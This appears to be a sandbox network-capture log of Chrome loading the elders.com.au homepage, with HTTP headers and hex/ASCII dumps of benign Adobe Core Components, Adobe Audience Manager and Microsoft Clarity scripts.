                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC608INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Tue, 02 Jul 2024 00:47:20 GMT
                                                                                                                                                                                                            etag: W/"4f7-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-sjc10031-SJC
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1720071107.278860,VS0,VS0,VE2
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 486849
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b03dac008784-DFW
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC761INData Raw: 34 66 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 43 51 3d 77 69 6e 64 6f 77 2e 43 51 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 3d 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 75 74 69 6c 73 3d 7b 7d 3b 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 75 74 69 6c 73 3d 7b
                                                                                                                                                                                                            Data Ascii: 4f7(function(){window.CQ=window.CQ||{};window.CQ.CoreComponents=window.CQ.CoreComponents||{};window.CQ.CoreComponents.container=window.CQ.CoreComponents.container||{};window.CQ.CoreComponents.container.utils={};window.CQ.CoreComponents.container.utils={
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC517INData Raw: 7b 76 61 72 20 67 3d 61 2e 5f 65 6c 65 6d 65 6e 74 73 5b 62 5d 5b 65 5d 2c 66 3d 21 31 3b 61 2e 5f 65 6c 65 6d 65 6e 74 73 5b 63 5d 26 26 28 66 3d 28 66 3d 61 2e 5f 65 6c 65 6d 65 6e 74 73 5b 63 5d 5b 65 5d 29 26 26 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 69 64 5c 78 33 64 27 22 2b 64 2b 22 27 5d 22 29 29 3b 69 66 28 67 2e 69 64 3d 3d 3d 64 7c 7c 66 29 72 65 74 75 72 6e 20 65 7d 7d 72 65 74 75 72 6e 2d 31 7d 2c 67 65 74 44 65 65 70 4c 69 6e 6b 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 3d 77 69 6e 64 6f 77 2e 43 51 2e 43 6f 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 75 74 69 6c 73 2e 67 65 74 44 65 65 70 4c 69 6e 6b 49 74 65 6d 49 64 78 28 61 2c 62 2c 63 29 3b 69 66 28 61 26 26 61 2e 5f 65 6c
                                                                                                                                                                                                            Data Ascii: {var g=a._elements[b][e],f=!1;a._elements[c]&&(f=(f=a._elements[c][e])&&f.querySelector("[id\x3d'"+d+"']"));if(g.id===d||f)return e}}return-1},getDeepLinkItem:function(a,b,c){c=window.CQ.CoreComponents.container.utils.getDeepLinkItemIdx(a,b,c);if(a&&a._el
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            130192.168.2.45780452.16.55.914432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC756OUTGET /dest5.html?d_nsid=0 HTTP/1.1
                                                                                                                                                                                                            Host: eldersrural.demdex.net
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: demdex=06707212550236574584203622074167040076
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC606INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                            Content-Length: 6983
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-TID: 41J7k0pZSWM=
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                            P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            last-modified: Tue, 5 Nov 2024 09:36:09 GMT
                                                                                                                                                                                                            DCS: dcs-prod-irl1-2-v068-056b45133.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC6983INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 41 75 64 69 65 6e 63 65 4d 61 6e 61 67 65 72 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Adobe AudienceManager</title><script type="text/javas


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            131192.168.2.45780813.107.246.454432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC595OUTGET /s/0.7.53/clarity.js HTTP/1.1
                                                                                                                                                                                                            Host: www.clarity.ms
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: CLID=489e5e226c6c49998a92be7444faa5c9.20241106.20251106
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Content-Length: 67020
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Last-Modified: Mon, 04 Nov 2024 16:45:38 GMT
                                                                                                                                                                                                            ETag: "0x8DCFCF01CE35FFD"
                                                                                                                                                                                                            x-ms-request-id: a170e794-c01e-0066-19da-2e61fb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            x-azure-ref: 20241106T052953Z-17df447cdb59mt7dhC1DFWqpg400000002b00000000088m9
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 51562430
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC15834INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 35 33 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                                                                                            Data Ascii: /* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC16384INData Raw: 2c 73 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c
                                                                                                                                                                                                            Data Ascii: ,selector:null,hash:null,region:l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC16384INData Raw: 74 2e 61 76 61 69 6c 61 62 69 6c 69 74 79 29 2c 47 72 28 31 34 2c 74 2e 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 29 2c 47 72 28 31 33 2c 74 2e 70 72 69 63 65 43 75 72 72 65 6e 63 79 29 2c 47 72 28 31 32 2c 74 2e 73 6b 75 29 2c 57 28 31 33 2c 5a 6e 28 74 2e 70 72 69 63 65 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 72 61 6e 64 22 3a 47 72 28 36 2c 74 2e 6e 61 6d 65 29 7d 6e 75 6c 6c 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64
                                                                                                                                                                                                            Data Ascii: t.availability),Gr(14,t.itemCondition),Gr(13,t.priceCurrency),Gr(12,t.sku),W(13,Zn(t.price));break;case"brand":Gr(6,t.name)}null!==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC16384INData Raw: 34 31 3a 53 74 26 26 28 65 2e 70 75 73 68 28 53 74 2e 69 64 29 2c 65 2e 70 75 73 68 28 53 74 2e 74 61 72 67 65 74 29 2c 65 2e 70 75 73 68 28 53 74 2e 63 68 65 63 6b 73 75 6d 29 2c 73 72 28 65 2c 21 31 29 29 7d 72 65 74 75 72 6e 5b 32 5d 7d 29 29 7d 29 29 7d 76 61 72 20 62 72 2c 77 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 72 28 74 2c 65 2c 6e 2c 61 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6e 75 6c 6c 29 3b 76 61 72 20 69 3d 6e 3f 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62
                                                                                                                                                                                                            Data Ascii: 41:St&&(e.push(St.id),e.push(St.target),e.push(St.checksum),sr(e,!1))}return[2]}))}))}var br,wr={};function kr(t,e,n,a,r){void 0===n&&(n=null),void 0===a&&(a=null),void 0===r&&(r=null);var i=n?"".concat(n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(b
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC2034INData Raw: 6d 61 6e 63 65 45 76 65 6e 74 54 69 6d 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 26 26 28 69 6f 28 61 29 2c 47 72 28 33 37 2c 61 6f 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 61 79 6f 75 74 2d 73 68 69 66 74 22 3a 65 26 26 21 61 2e 68 61 64 52 65 63 65 6e 74 49 6e 70 75 74 26 26 50 28 39 2c 31 65 33 2a 61 2e 76 61 6c 75 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 61 72 67 65 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3a 65 26 26 57 28 38 2c 61 2e 73 74 61 72 74 54 69 6d 65 29 7d 7d 7d 28 74 2e 67 65 74 45 6e 74 72 69 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 6f 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                            Data Ascii: manceEventTiming.prototype&&(io(a),Gr(37,ao().toString()));break;case"layout-shift":e&&!a.hadRecentInput&&P(9,1e3*a.value);break;case"largest-contentful-paint":e&&W(8,a.startTime)}}}(t.getEntries())}function so(t){var e=document.createElement("a");return


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            132192.168.2.457815162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC943OUTGET /etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Tue, 01 Oct 2024 13:06:01 GMT
                                                                                                                                                                                                            etag: W/"4748d-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 490882
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210142-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1727787961.537213,VS0,VS0,VE1010
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b03f1af74677-DFW
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC741INData Raw: 37 64 32 61 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 39 20 41 64 6f 62 65 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 20 59 6f 75
                                                                                                                                                                                                            Data Ascii: 7d2a/******************************************************************************* * Copyright 2019 Adobe * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 2a 2a 2a 2a 2a 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 45 6c 65 6d 65 6e 74 2e 6d 61 74 63 68 65 73 28 29 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 65 6e 55 53 2f 64 6f 63 73 2f 57 65 62 2f 41 50 49 2f 45 6c 65 6d 65 6e 74 2f 6d 61 74 63 68 65 73 23 50 6f 6c 79 66 69 6c 6c 0a 20 2a 2f 0a 69 66 20 28 21 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 29 20 7b 0a 20 20 20 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 20 3d 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 20 7c 7c 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63
                                                                                                                                                                                                            Data Ascii: ******//** * Element.matches() * https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill */if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector || Element.prototype.webkitMatchesSelec
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 0a 20 2a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 0a 20 2a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. ******************************************************************************/(function() { "use strict";
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 6e 65 6c 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 69 64 64 65 6e 3a 20 22 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 70 61 6e 65 6c 2d 2d 68 69 64 64 65 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 78 70 61 6e 64 65 64 3a 20 22 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 70 61 6e 65 6c 2d 2d 65 78 70 61 6e 64 65 64 22 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 76 61 72 20 64 61 74 61 41 74 74 72 69 62 75 74 65 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 69 74 65 6d 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 78 70 61 6e 64 65 64 3a 20 22 64 61 74 61 2d 63 6d 70 2d 65 78 70 61 6e 64 65 64 22 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 76 61 72 20 70 72 6f 70 65 72 74 69 65 73 20 3d
                                                                                                                                                                                                            Data Ascii: nel: { hidden: "cmp-accordion__panel--hidden", expanded: "cmp-accordion__panel--expanded" } }; var dataAttributes = { item: { expanded: "data-cmp-expanded" } }; var properties =
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 20 20 2a 20 49 6e 69 74 69 61 6c 69 7a 65 73 20 74 68 65 20 41 63 63 6f 72 64 69 6f 6e 2e 0a 20 20 20 20 20 20 20 20 20 2a 0a 20 20 20 20 20 20 20 20 20 2a 20 40 70 72 69 76 61 74 65 0a 20 20 20 20 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 41 63 63 6f 72 64 69 6f 6e 43 6f 6e 66 69 67 7d 20 63 6f 6e 66 69 67 20 54 68 65 20 41 63 63 6f 72 64 69 6f 6e 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 0a 20 20 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 28 63 6f 6e 66 69 67 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 2e 5f 63 6f 6e 66 69 67 20 3d 20 63 6f 6e 66 69 67 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 70 72 65 76 65 6e 74 73 20 6d 75 6c 74
